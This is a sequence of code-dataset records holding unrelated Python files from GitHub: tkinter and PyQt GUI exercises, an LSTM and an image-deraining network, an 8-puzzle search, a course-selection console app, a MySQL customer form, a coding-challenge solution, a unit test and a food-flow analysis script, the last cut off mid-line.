enumerate(icons):\n btn = PyQt6.QtWidgets.QPushButton(name)\n\n pixmapi = getattr(PyQt6.QtWidgets.QStyle.StandardPixmap, name)\n icon = self.style().standardIcon(pixmapi)\n btn.setIcon(icon)\n layout.addWidget(btn, int(n/4), int(n%4))\n\n self.setLayout(layout)\n\n\n\nw = Window()\nw.show()\n\n\napp.exec()\n","repo_name":"cadeauthom/giftray_py","sub_path":"test5.py","file_name":"test5.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"39020423575","text":"import turtle\r\nfrom tkinter import *\r\n\r\nwindow = Tk()\r\nwindow.title(\"My first GUI program\")\r\nwindow.minsize(width=500, height=300)\r\n\r\nmy_label = Label(text=\"I m a label\", font=(\"Arial\", 24, \"bold\"))\r\nmy_label.grid(row=0, column=0)\r\n\r\n\r\ndef button_click():\r\n new = input_sth.get()\r\n my_label[\"text\"] = input_sth.get()\r\n\r\n\r\nbutton = Button(text=\"click me\", command=button_click)\r\nbutton.grid(row=1, column=1)\r\n\r\n\r\ndef button_clicked():\r\n new = input_sth.get()\r\n my_label[\"text\"] = new\r\n\r\n\r\nbutton = Button(text=\"new button\", command=button_clicked)\r\nbutton.grid(row=0, column=3)\r\n\r\ninput_sth = Entry(width=10)\r\ninput_sth.grid(row=3, column=3)\r\n\r\n\r\nwindow.mainloop()\r\n","repo_name":"germainsafari/100-days-of-code-bootcamp","sub_path":"100daysofcode/day-27/thinker.py","file_name":"thinker.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"32912046987","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport torch\nimport torch.nn as nn\n\n################################################################################\n\nclass LSTM(nn.Module):\n\n\tdef __init__(self, seq_length, input_dim, num_hidden, num_classes, batch_size, device='cpu'):\n\t\tsuper(LSTM, self).__init__()\n\t\tself.seq_length = seq_length\n\t\tself.input_dim = input_dim\n\t\tself.num_hidden = num_hidden\n\t\tself.num_classes = num_classes\n\t\tself.batch_size = batch_size\n\t\tself.device = device\n\n\t\tself.w_gx = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_gh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_g = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ix = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_ih = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_i = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_fx = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_fh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_f = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ox = torch.nn.Parameter(torch.Tensor(input_dim, num_hidden).to(device))\n\t\tself.w_oh = torch.nn.Parameter(torch.Tensor(num_hidden, num_hidden).to(device))\n\t\tself.b_o = torch.nn.Parameter(torch.Tensor(num_hidden).to(device))\n\n\t\tself.w_ph = torch.nn.Parameter(torch.Tensor(num_hidden, num_classes).to(device))\n\t\tself.b_p = torch.nn.Parameter(torch.Tensor(num_classes).to(device))\n\n\t\t# Initialization \n\t\tself.w_gx = nn.init.kaiming_normal_(self.w_gx)\n\t\tself.w_gh = nn.init.kaiming_normal_(self.w_gh)\n\t\tself.b_g = nn.init.constant_(self.b_g, 0)\n\t\tself.w_ix = nn.init.kaiming_normal_(self.w_ix)\n\t\tself.w_ih = nn.init.kaiming_normal_(self.w_ih)\n\t\tself.b_i = nn.init.constant_(self.b_i, 0)\n\t\tself.w_fx = nn.init.kaiming_normal_(self.w_fx)\n\t\tself.w_fh = nn.init.kaiming_normal_(self.w_fh)\n\t\tself.b_f = nn.init.constant_(self.b_f, 0)\n\t\tself.w_ox = nn.init.kaiming_normal_(self.w_ox)\n\t\tself.w_oh = nn.init.kaiming_normal_(self.w_oh)\n\t\tself.b_o = nn.init.constant_(self.b_o, 0)\n\t\tself.w_ph = nn.init.kaiming_normal_(self.w_ph)\n\t\tself.b_p = nn.init.constant_(self.b_p, 0)\n\n\t\t# Initialize h(0)\n\t\tself.h_t = torch.zeros((self.batch_size, self.num_hidden)).to(device)\n\t\t# Initialize c(0)\n\t\tself.c_t = torch.zeros((self.batch_size, self.num_hidden)).to(device)\n\n\n\tdef forward(self, x):\n\t\th_prev = self.h_t\n\t\tc_prev = self.c_t\n\t\tfor t in range(self.seq_length):\n\t\t\tg_t = torch.tanh(x[:, t, :] @ self.w_gx + h_prev @ self.w_gh + self.b_g)\n\t\t\ti_t = torch.sigmoid(x[:, t, :] @ self.w_ix + h_prev @ self.w_ih + self.b_i)\n\t\t\tf_t = torch.sigmoid(x[:, t, :] @ self.w_fx + h_prev @ self.w_fh + self.b_f)\n\t\t\to_t = torch.sigmoid(x[:, t, :] @ self.w_ox + h_prev @ self.w_oh + self.b_o)\n\t\t\tc_t = torch.mul(g_t, i_t) + torch.mul(c_prev, f_t)\n\t\t\th_t = torch.mul(torch.tanh(c_t), o_t)\n\t\t\tp_t = h_t @ self.w_ph + self.b_p\n\t\t\th_prev = h_t\n\t\t\tc_prev = c_t\n\t\treturn 
p_t","repo_name":"martinetoering/Deep-Learning","sub_path":"Part2-RNN-LSTM-Graph/part1/lstm.py","file_name":"lstm.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"27602121492","text":"import math\n# PyTorch lib\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.utils.data as Data\nimport torch.nn.functional as F\n\nimport split_attention as split\n\nfrom model import architecture\n\nimport ASPP\n\n\nclass MSDAN(nn.Module):\n def __init__(self, recurrent_iter=3, use_GPU=True):\n super(MSDAN, self).__init__()\n self.iteration = recurrent_iter\n self.use_GPU = use_GPU\n\n self.conv_i = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n self.conv_f = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n self.conv_g = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Tanh()\n )\n self.conv_o = nn.Sequential(\n nn.Conv2d(32 + 32, 32, 3, 1, 1),\n nn.Sigmoid()\n )\n\n self.pyramid = ASPP.ASPP()\n\n self.SplAtConv2d = split.SplAtConv2d(in_channels=32, channels=32, kernel_size=3, stride=1, padding=1,\n dilation=1, groups=1, bias=True, radix=2)\n\n self.architecture = architecture.IMDN(in_nc=32, upscale=1)\n\n def forward(self, input): # input(16, 3, 100, 100)\n batch_size, row, col = input.size(0), input.size(2), input.size(3)\n\n x = input # (16, 3, 100, 100)\n h = Variable(torch.zeros(batch_size, 32, row, col)) # (16, 32, 100, 100)\n c = Variable(torch.zeros(batch_size, 32, row, col)) # (16, 32, 100, 100)\n\n if self.use_GPU:\n h = h.cuda()\n c = c.cuda()\n\n x_list = []\n for i in range(self.iteration):\n x = input\n x = torch.cat((input, x), 1) # (16, 6, 100, 100)\n\n x = self.pyramid(x)\n\n # x = self.conv0(x) # (16, 32, 100, 100)\n\n x = torch.cat((x, h), 1) # (16, 64, 100, 100)\n\n i = self.conv_i(x) # (16, 32, 100, 100)\n f = self.conv_f(x) # (16, 32, 100, 100)\n g = self.conv_g(x) # (16, 32, 100, 100)\n o = self.conv_o(x) # (16, 32, 100, 100)\n c = f * c + i * g # (16, 32, 100, 100)\n x = o * torch.tanh(c) # (16, 32, 100, 100)\n # print(x.shape)\n\n x = self.SplAtConv2d(x)\n\n x = self.architecture(x)\n\n x_list.append(x)\n\n return x, x_list\n\n\nif __name__ == '__main__':\n ts = torch.Tensor(16, 3, 64, 64)\n vr = Variable(ts)\n net = MSDAN()\n\n\n","repo_name":"lydeath/MSDAN","sub_path":"networks.py","file_name":"networks.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"73155195751","text":"# 扩展出不同状态\r\ndef expend(state): # state为扩展前的状态\r\n\r\n # 检验当前深度是否已经超出上限,若超出上限,则不进行扩展\r\n if gn[state] > int(depth_limit):\r\n return None\r\n\r\n expended = []\r\n k = state.index(\"0\") # k为0所在的位置\r\n for a in range(0, len(movs[k])):\r\n i = k # i为0的位置\r\n j = movs[i][a] # j为待交换元素的位置\r\n if i > j:\r\n i, j = j, i\r\n new = state[: i] + state[j] + state[i + 1: j] + state[i] + state[j + 1:] # 扩展出的一个新状态\r\n expended.append(new)\r\n return expended\r\n\r\n\r\ndef reverse_number(state):\r\n Sum = 0\r\n for i in range(1, 9):\r\n num = 0\r\n for j in range(0, i):\r\n if state[j] > state[i] != '0':\r\n num = num + 1\r\n Sum += num\r\n return Sum\r\n\r\n\r\ndef is_solvable(S0):\r\n i = reverse_number(S0)\r\n j = reverse_number(goal)\r\n if i % 2 == j % 2:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef print_result(state):\r\n # 根据parent中的索引,找出路径\r\n results = [state] # 用来存放路径\r\n while parent[state] != -1:\r\n state = parent[state]\r\n results.append(state)\r\n results.reverse() # 逆序\r\n print(\"可求解,求解过程如下:\")\r\n i = -1\r\n for result in results:\r\n i = i + 1\r\n print(\"\")\r\n print(\"step----\" + str(i))\r\n print(result[:3])\r\n print(result[3:6])\r\n print(result[6:])\r\n print(\"\")\r\n\r\n\r\ndef search_depth(S0):\r\n global parent\r\n global gn\r\n global limit\r\n\r\n sum = limit\r\n opened = []\r\n closed = []\r\n\r\n # S0加入opened表\r\n opened.append(S0)\r\n\r\n # 开始搜索\r\n while opened:\r\n\r\n # 检验搜索次数是否超出限制\r\n limit = limit - 1\r\n search_times = sum - limit\r\n print(\"正在进行第%d次搜索\" % search_times)\r\n if limit < 1:\r\n return current\r\n\r\n # opened表中删除第一个状态n,将n放入closed表,\r\n current = opened.pop() # 宽度优先:opened表使用先进先出的堆栈结构,使搜索优先偏向先生成的状态\r\n closed.append(current)\r\n print(\"正在搜索第%d层\" % gn[current])\r\n print(\"curret:\" + current)\r\n print(\"goal:\" + goal)\r\n\r\n # 搜索成功,结束循环\r\n if current == goal:\r\n break\r\n\r\n # 扩展当前状态,删除子状态中在opened表或closed表中出现过的状态,避免重复循环搜索\r\n # 其余子状态加入opened表\r\n newStates = expend(current)\r\n if newStates is None:\r\n continue\r\n\r\n for s in newStates:\r\n if s not in opened and s not in closed:\r\n gn[s] = gn[current] + 1\r\n parent[s] = current\r\n opened.append(s)\r\n # 检验是由于opened表为空而停止,还是因为搜索到了解路径而停止。\r\n if not opened:\r\n print(\"有解但是由于深度限制无法求出解!\")\r\n return current\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n # 操作算子集合\r\n movs = {0: [1, 3], 1: [0, 2, 4], 2: [1, 5], 3: [0, 4, 6], 4: [3, 1, 5, 7], 5: [4, 2, 8], 6: [3, 7], 7: [6, 4, 8],\r\n 8: [7, 5]}\r\n\r\n gn = {} # gn用于存放各个状态所在深度\r\n parent = {} # 用于存放各个状态的父状态,用于输出解路径\r\n # 输入初始状态和目标状态\r\n state0 = input(\"请输入初始状态(从左到右从上到下):\")\r\n goal = input(\"请输入目标状态(从左到右从上到下):\")\r\n\r\n # 输入搜索次数上限\r\n limit = int(input(\"请输入搜索次数的上限(例如:50000):\"))\r\n\r\n # 输入深度上限\r\n depth_limit = int(input(\"请输入搜索深度的上限(例如:5000):\"))\r\n\r\n parent[state0] = -1 # 初始状态的父状态设置为-1\r\n gn[state0] = 0 # 初始状态的深度设置为0\r\n\r\n # 判断是否有解\r\n if state0 == goal:\r\n print(\"初始状态与目标状态一致,搜索结束。\")\r\n elif not is_solvable(state0) or len(state0) != 9:\r\n print(\"不可达,无解!\")\r\n else:\r\n current = search_depth(state0) # 开始搜索\r\n print_result(current) # 按格式输出结果\r\n if limit == 0:\r\n print(\"有解但搜索超时,建议更换搜索算法或目标序列!!!\")\r\n","repo_name":"xxLL-xh/artificial-intelligence","sub_path":"人工智能导论/5.盲目搜索策略:深度优先搜索解决“八数码”问题/code/search_depth.py","file_name":"search_depth.py","file_ext":"py","file_size_in_byte":4424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"8282388251","text":"from interface import teacher_interface,common_interface\nfrom lib import common\nuser_data={'name':None}\ndef login():\n while True:\n name=input('please input your username>>:').strip()\n password=input('plesae input your password>>:').strip()\n flag,msg=common_interface.login(name,password,'teacher')\n if flag:\n user_data['name']=name\n print(msg)\n break\n else:print(msg)\n@common.login_auth('teacher')\ndef check_courses():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n for i in course_list:\n print(i)\n else:print('暂无教授的课程')\n@common.login_auth('teacher')\ndef choose_course():\n course_list=common_interface.check_info('course')\n if course_list:\n for i,name in enumerate(course_list):\n print(i+1,name)\n dec= input('please choice>>\"').strip()\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(course_list) + 1):\n course_name = course_list[dec - 1]\n teacher_interface.choose_course(course_name,user_data['name'])\n print('选课成功')\n return\n else:print('not in range')\n else:print('must be int ')\n else:print('暂无任何课程')\n@common.login_auth('teacher')\ndef check_student():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n while True:\n for i,name in enumerate(course_list):\n print(i,name)\n dec=input('please choice>>:').strip()\n if dec=='q':return\n if dec.isdigit():\n dec=int(dec)\n if dec in range(0,len(course_list)):\n coures_name=course_list[dec]\n student_list=teacher_interface.check_student(coures_name)\n if student_list:\n for name in student_list:\n print(name)\n return\n else:print('not student')\n else:print('range error')\n else:print('must be int')\n else:print('暂无教授课程所以无法查看学生')\n@common.login_auth('teacher')\ndef modify_score():\n course_list=teacher_interface.check_courses(user_data['name'])\n if course_list:\n while True:\n for i,course in enumerate(course_list):\n print(i+1,course)\n dec=input('你想修改哪门课程下的学生成绩>>:').strip()\n if dec=='q':return\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(course_list) + 1):\n course_name = course_list[dec - 1]\n student_list=teacher_interface.check_student(course_name)\n if student_list:\n for i,name in enumerate(student_list):\n print(i+1,name)\n dec=input('please choose student').strip()\n if dec.isdigit():\n dec = int(dec)\n if dec in range(1, len(student_list) + 1):\n student_name = student_list[dec - 1]\n score=input('你想将学生这门课的成绩改成多少?').strip()\n if score.isdigit():\n score=int(score)\n teacher_interface.modify(student_name,course_name,score,user_data['name'])\n print('修改成功')\n return\n else:print('分数必须是数字')\n else:print('not in normal range')\n else:print('choose must be int')\n else:print('课程下暂无学生')\n else:print('not in normal range')\n else:print('choose must be int')\n else:print('你暂时还没有教授的课程')\n\nfunc_dic={'1':login,'2':check_courses,'3':choose_course,'4':check_student,'5':modify_score}\ndef run():\n while True:\n print('''\n 1、登录\n 2、查看教授课程\n 3、选择教授课程\n 4、查看课程下学生\n 5、修改学生成绩 \n ''')\n choice = input('please choice>>:').strip()\n if choice not in func_dic: continue\n func_dic[choice]()","repo_name":"DominicJi/Select_Course_System","sub_path":"core/teacher.py","file_name":"teacher.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72262294309","text":"import tkinter as tk\nfrom tkinter import ttk, messagebox\nimport mysql.connector\nfrom tkinter import *\n\n\ndef GetValue(event):\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n row_id = listBox.selection()[0]\n select = listBox.set(row_id)\n e1.insert(0, select['customerid'])\n e2.insert(0, select['customername'])\n e3.insert(0, select['email'])\n e4.insert(0, select['contact'])\n\n\ndef Add():\n customerid = e1.get()\n customername = e2.get()\n email = e3.get()\n contact = e4.get()\n\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"INSERT INTO customer (customerid,customername,email,contact) VALUES (%s, %s, %s, %s)\"\n val = (customerid, customername, email, contact)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\"information\", \"Customer inserted successfully...\")\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n except Exception as e:\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef update():\n customerid = e1.get()\n customername = e2.get()\n email = e3.get()\n contact = e4.get()\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"Update customer set customername= %s,email= %s,contact= %s where customerid= %s\"\n val = (customername, email, contact, customerid)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\n \"information\", \"Record Updateddddd successfully...\")\n\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n\n except Exception as e:\n\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef delete():\n studid = e1.get()\n\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n\n try:\n sql = \"delete from customer where customerid = %s\"\n val = (id,)\n mycursor.execute(sql, val)\n mysqldb.commit()\n lastid = mycursor.lastrowid\n messagebox.showinfo(\"information\", \"Record Deleteeeee successfully...\")\n\n e1.delete(0, END)\n e2.delete(0, END)\n e3.delete(0, END)\n e4.delete(0, END)\n e1.focus_set()\n\n except Exception as e:\n\n print(e)\n mysqldb.rollback()\n mysqldb.close()\n\n\ndef show():\n mysqldb = mysql.connector.connect(\n host=\"127.0.0.1\", user=\"root\", password=\"12345\", database=\"cms\")\n mycursor = mysqldb.cursor()\n mycursor.execute(\n \"SELECT customerid,customername,email,contact FROM customer\")\n records = mycursor.fetchall()\n print(records)\n\n for i, (customerid, customername, email, contact) in enumerate(records, start=1):\n listBox.insert(\"\", \"end\", values=(\n customerid, customername, email, contact))\n mysqldb.close()\n\n\nroot = Tk()\nroot.geometry(\"800x500\")\nglobal e1\nglobal e2\nglobal e3\nglobal e4\n\ntk.Label(root, bg=\"yellow\", text=\"Customer Registration\",\n fg=\"red\", font=(None, 30)).place(x=300, y=5)\n\ntk.Label(root, text=\"Customer ID\").place(x=10, y=10)\nLabel(root, text=\"Customer Name\").place(x=10, y=40)\nLabel(root, text=\"Email\").place(x=10, y=70)\nLabel(root, text=\"Contact\").place(x=10, y=100)\n\ne1 = Entry(root)\ne1.place(x=140, y=10)\n\ne2 = Entry(root)\ne2.place(x=140, y=40)\n\ne3 = Entry(root)\ne3.place(x=140, y=70)\n\ne4 
= Entry(root)\ne4.place(x=140, y=100)\n\nButton(root, text=\"Add\", command=Add, height=3, width=13).place(x=30, y=130)\nButton(root, text=\"update\", command=update,\n height=3, width=13).place(x=140, y=130)\nButton(root, text=\"Delete\", command=delete,\n height=3, width=13).place(x=250, y=130)\n\ncols = ('Customer id', 'Customer name', 'Email', 'Contact')\nlistBox = ttk.Treeview(root, columns=cols, show='headings')\n\nfor col in cols:\n listBox.heading(col, text=col)\n listBox.grid(row=1, column=0, columnspan=2)\n listBox.place(x=10, y=200)\n\nshow()\nlistBox.bind('', GetValue)\n\nroot.mainloop()\n","repo_name":"arfa-shaikh/form","sub_path":"form1.py","file_name":"form1.py","file_ext":"py","file_size_in_byte":4409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"14714248098","text":"# 기본수학1\n# 백준 - 10250번 \n\n# 1st try: \n\nimport sys\n\nT = int(input())\n\nRN_list = []\nfor i in range(T):\n H, W, N = map(int, sys.stdin.readline().split())\n N = N-1\n if H == 1: # H(층 수)가 1개일 경우\n room_number = '1' + (str(N+1) if N>10 else '0'+str(N+1))\n elif W == 1: # W(층별 방 개수)가 1개일 경우\n room_number = str(N+1) + '01'\n else: # 방 번호 = N을 H(층)으로 나눈 나머지 + N을 H(층)으로 나눈 몫\n room_number = str(N%H+1) + (str(0)+str(N//H+1) if N//H+1<10 else str(N//H+1))\n RN_list.append(room_number)\n\nfor room_number in RN_list: \n print(room_number)\n\n# 2nd try: \n'''\nimport sys \n\nH, W = map(int, sys.stdin.readline().split())\n\nfor N in range(1, H*W+1):\n if H == 1: # H(층 수)가 1개일 경우\n room_number = '1' + (str(N) if N>=10 else '0'+str(N))\n elif W == 1: # W(층별 방 개수)가 1개일 경우\n room_number = str(N) + '01'\n else: # 방 번호 = N을 H(층)으로 나눈 나머지 + N을 H(층)으로 나눈 몫\n room_number = str(N%(H+1) if N%(H+1)!=0 else continue) + (str(0)+str(N//H+1) if N//H+1<10 else str(N//H+1))\n print(room_number)\n'''\n\n'''\nimport sys \n\nH, W = map(int, sys.stdin.readline().split())\n\nfor N in range(H*W+1):\n # 앞자리 Y 연산\n Y = str(N%H+1)\n \n # 뒷자리 X 연산\n if N//H+1 < 10:\n X = str(0)+str(N//H+1)\n else:\n X = str(N//H+1)\n\n room_number = f'{N}: ' + Y + ' ' + X\n print(room_number)\n\n'''","repo_name":"asdfrv20/Three_Dorks","sub_path":"12_정렬/10250_ACM호텔.py","file_name":"10250_ACM호텔.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"31216601857","text":"from cdr import Cdr\nimport unittest\nfrom datetime import datetime\n\n\nclass TestSerializeCdr(unittest.TestCase):\n\n def get_a_cdr(self, now):\n d = Cdr()\n\n e = Cdr()\n e[11] = 123\n e[12] = \"hi\"\n\n f = Cdr()\n f[21] = 456\n f[22] = \"yo\"\n\n d[1] = 123\n d[2] = \"Hello\"\n d[3] = \"World\"\n d[4] = 1.25\n d[5] = now\n\n d[6] = [e, f]\n\n return d\n\n def test_serialize(self):\n d = self.get_a_cdr(datetime.now())\n\n data = d.serialize()\n\n e = Cdr()\n e.deserialize(data)\n\n self.assertEqual(e.keys(), d.keys())\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"blu-corner/cdr","sub_path":"test/python/test_serialize.py","file_name":"test_serialize.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"}
+{"seq_id":"24585213952","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport geopandas as gpd\nfrom shapely import wkt\nimport numpy as np\nimport seaborn as sns\nimport pyproj\n\n\n### Accessing the data\n\n#The dataset is available on Zenodo (https://zenodo.org/record/6423382#.Y-PdQq2ZO3A). We save the dataset to \"/my_directory/\" and access it using the package pandas, which converts the original .csv file to a pandas dataframe. Note that encoding has to be defined as 'cp1252'.\n\ndata_directory=\"/my_directory/\"\ndf=pd.read_csv(data_directory+\"Food_flow_data_v1.csv\", delimiter=';', encoding='cp1252')\ndf.head()\n\n#To create a subset of data containing inflows on the one hand and outflows on the other, we extract those rows with the source outside and the destination within the urban boundary for inflows, and vice versa for outflows.\n\ndf_incoming=df[(df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_outgoing=df[(df[\"source_within_urban_boundary\"] == \"yes\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\n\n### Secondary data\n\n#Below, we take a look at the secondary data for Ouaga, which were added to the dataset. First, we show absolute and relative quantities of incoming products by railway. Second, we look at outgoing flows by plane.\n\n# Ouaga secondary data\n# Rail incoming\ndf_incoming_ouaga_or=df[(df[\"city\"] == \"Ouagadougou\") & (df[\"source_within_urban_boundary\"] == \"no\") & (df[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_incoming_ouaga=df_incoming_ouaga_or.copy()\ndf_incoming_ouaga.loc[df_incoming_ouaga['commodity_name_gen'] == 'Wheat flour', 'commodity_name_gen'] = 'Wheat'\ndf_incoming_ouaga_transport_rail=df_incoming_ouaga[(df_incoming_ouaga['means_of_transport']=='Rail')]\ndf_incoming_ouaga_transport_rail_sum=df_incoming_ouaga_transport_rail.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_ouaga_transport_rail_sum['quantity_rail_kg_per_day']=df_incoming_ouaga_transport_rail_sum['daily_quantity_adjusted_for_missing_locations']\ndf_incoming_ouaga_transport_rail_sum_new=df_incoming_ouaga_transport_rail_sum.drop(columns='daily_quantity_adjusted_for_missing_locations')\ndf_incoming_ouaga_transport_all_sum=df_incoming_ouaga.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_ouaga_merge=pd.merge(df_incoming_ouaga_transport_all_sum, df_incoming_ouaga_transport_rail_sum_new, on=['commodity_name_gen', 'season'], how='right')\ndf_incoming_ouaga_merge['rail_percent_of_total_incoming']=df_incoming_ouaga_merge['quantity_rail_kg_per_day']*100/df_incoming_ouaga_merge['daily_quantity_adjusted_for_missing_locations']\nprint(df_incoming_ouaga_merge)\n\n# Ouaga secondary data\n# air outgoing\n\ndf_outgoing_ouaga_or=df[(df[\"city\"] == \"Ouagadougou\") & (df[\"source_within_urban_boundary\"] == \"yes\") & (df[\"destination_within_urban_boundary\"] == \"no\")]\ndf_outgoing_ouaga=df_outgoing_ouaga_or.copy()\ndf_outgoing_ouaga_transport_air=df_outgoing_ouaga[(df_outgoing_ouaga['means_of_transport']=='Plane')]\ndf_outgoing_ouaga_transport_air_sum=df_outgoing_ouaga_transport_air.groupby(['commodity_name_gen', 'season'], 
as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_ouaga_transport_air_sum['quantity_air_kg_per_day']=df_outgoing_ouaga_transport_air_sum['daily_quantity_adjusted_for_missing_locations']\ndf_outgoing_ouaga_transport_air_sum_new=df_outgoing_ouaga_transport_air_sum.drop(columns='daily_quantity_adjusted_for_missing_locations')\ndf_outgoing_ouaga_transport_all_sum=df_outgoing_ouaga.groupby(['commodity_name_gen', 'season'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_outgoing_ouaga_merge=pd.merge(df_outgoing_ouaga_transport_all_sum, df_outgoing_ouaga_transport_air_sum_new, on=['commodity_name_gen', 'season'], how='right')\ndf_outgoing_ouaga_merge['air_percent_of_total_outgoing']=df_outgoing_ouaga_merge['quantity_air_kg_per_day']*100/df_outgoing_ouaga_merge['daily_quantity_adjusted_for_missing_locations']\nprint(df_outgoing_ouaga_merge)\n\n### Fig. 6: Daily per capita inflows (in kg/cap/day) per food group\n#Fig. 6 shows inflows for all four cities aggregated at the level of commodity category (or food group).\n\ndf_incoming_lean=df_incoming[((df_incoming['season']=='lean') & (df_incoming['city']=='Ouagadougou')) | ((df_incoming['season']=='lean') & (df_incoming['city']=='Bamako')) | ((df_incoming['season']=='lean') & (df_incoming['city']=='Bamenda')) | ((df_incoming['season']=='lean') & (df_incoming['year']==2014) & (df_incoming['city']=='Tamale'))]\ndf_incoming_lean_by_category=df_incoming_lean.groupby(['city', 'commodity_category', 'population'], as_index=False)['daily_quantity_adjusted_for_missing_locations'].sum()\ndf_incoming_lean_by_category['daily_per_capita_quantity']=df_incoming_lean_by_category['daily_quantity_adjusted_for_missing_locations']/df_incoming_lean_by_category['population']\n\npalette = {'Tamale': '#20639B', 'Ouagadougou': '#3CAEA3', 'Bamako': '#F6D55C', 'Bamenda':'#ED553B'}\nax=sns.barplot(data=df_incoming_lean_by_category, x='commodity_category', y='daily_per_capita_quantity', hue='city', palette=palette)\nplt.xticks(fontsize=8)\nplt.yticks(fontsize=8)\nplt.ylabel('Quantity (kg/cap/day)',fontsize=10)\nplt.xlabel('Commodity category',fontsize=10)\nplt.title('Food inflows (lean season)')\nplt.setp(ax.get_legend().get_texts(), fontsize='8') # for legend text\nplt.setp(ax.get_legend().get_title(), fontsize='10') # for legend title\nplt.show()\n\n### Fig. 7: In- and outflows in kg/day of maize in Tamale (peak season).\n#Fig. 7 plots sources and destinations of maize flows for Tamale (lean season 2014), where the symbol size reflects the absolute quantity (not adjusted by % missing locations).\n#Note that we import the package pyproj to get the country delineation as a basemap. 
We need to change the directory as the package would otherwise access an existing, but older, version of pyproj in PostGIS.\n\npyproj.datadir.set_data_dir(\"C:\\\\Users\\\\hanna\\\\anaconda3\\\\pkgs\\\\proj-9.1.0-heca977f_1\\\\Library\\\\share\\\\proj\")\n\n# Tamale & maize\ndf_tle_maize=df[(df['city']=='Tamale') & (df['commodity_name_gen']=='Maize')]\ndf_incoming_tle_maize=df_tle_maize[(df_tle_maize[\"source_within_urban_boundary\"] == \"no\") & (df_tle_maize[\"destination_within_urban_boundary\"] == \"yes\")]\ndf_incoming_tle_maize_peak=df_incoming_tle_maize[(df_incoming_tle_maize['season']=='peak') & (df_incoming_tle_maize['year']==2014)]\n\n#inflows\ndaily_quantity_source_geo_sum_tle=df_incoming_tle_maize_peak.groupby(['city','commodity_name_gen', 'season', 'year', 'source_geometry'], as_index=False)['daily_quantity'].sum()\n\n#outflows\ndf_outgoing_tle_maize=df_tle_maize[(df_tle_maize[\"source_within_urban_boundary\"] == \"yes\") & (df_tle_maize[\"destination_within_urban_boundary\"] == 